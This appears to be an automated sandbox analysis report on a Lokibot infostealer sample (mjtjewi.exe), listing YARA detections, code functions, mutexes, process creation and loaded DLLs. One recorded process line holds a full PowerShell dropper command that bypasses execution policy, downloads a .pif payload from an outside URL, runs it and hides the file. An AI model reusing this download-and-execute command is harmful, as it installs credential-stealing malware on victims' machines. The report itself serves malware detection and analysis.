Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D48	4_2_01526D48
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015245F1	4_2_015245F1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015231E8	4_2_015231E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152459F	4_2_0152459F
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526870	4_2_01526870
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522462	4_2_01522462
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526862	4_2_01526862
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015218CF	4_2_015218CF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152A668	4_2_0152A668
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A90	4_2_01526A90
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A80	4_2_01526A80
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92E0	4_2_02DF92E0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF8392	4_2_02DF8392
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7088	4_2_02DF7088
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF5520	4_2_02DF5520
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7918	4_2_02DF7918
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92B9	4_2_02DF92B9
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA218	4_2_02DFA218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFF218	4_2_02DFF218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA208	4_2_02DFA208
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7358	4_2_02DF7358
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0310	4_2_02DF0310
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0320	4_2_02DF0320
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7053	4_2_02DF7053
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB611	4_2_02DFB611
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB620	4_2_02DFB620
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF1778	4_2_02DF1778
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF176A	4_2_02DF176A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFBA88	4_2_02DFBA88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8B8	4_2_02DFB8B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8A8	4_2_02DFB8A8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19D8	4_2_02DF19D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19C8	4_2_02DF19C8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFAFF8	4_2_02DFAFF8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B88	4_2_0AC90B88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9E081	4_2_0AC9E081
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9262E	4_2_0AC9262E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CDC0	4_2_0AC9CDC0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B78	4_2_0AC90B78
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90040	4_2_0AC90040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90006	4_2_0AC90006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FC8	4_2_0AC91FC8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FB8	4_2_0AC91FB8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9BC1A	4_2_0AC9BC1A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CD8E	4_2_0AC9CD8E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50040	4_2_0AF50040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50006	4_2_0AF50006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_0040549C	6_2_0040549C
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_004029D4	6_2_004029D4

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 00405B6F appears 42 times

PE file contains executable resources (Code or Archives)

Source: mjtjewi.exe.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Yara signature match

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: mjtjewi.exe.0.dr

Static PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@12/10@3/2

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

6_2_0040434D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\mjtjewi.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
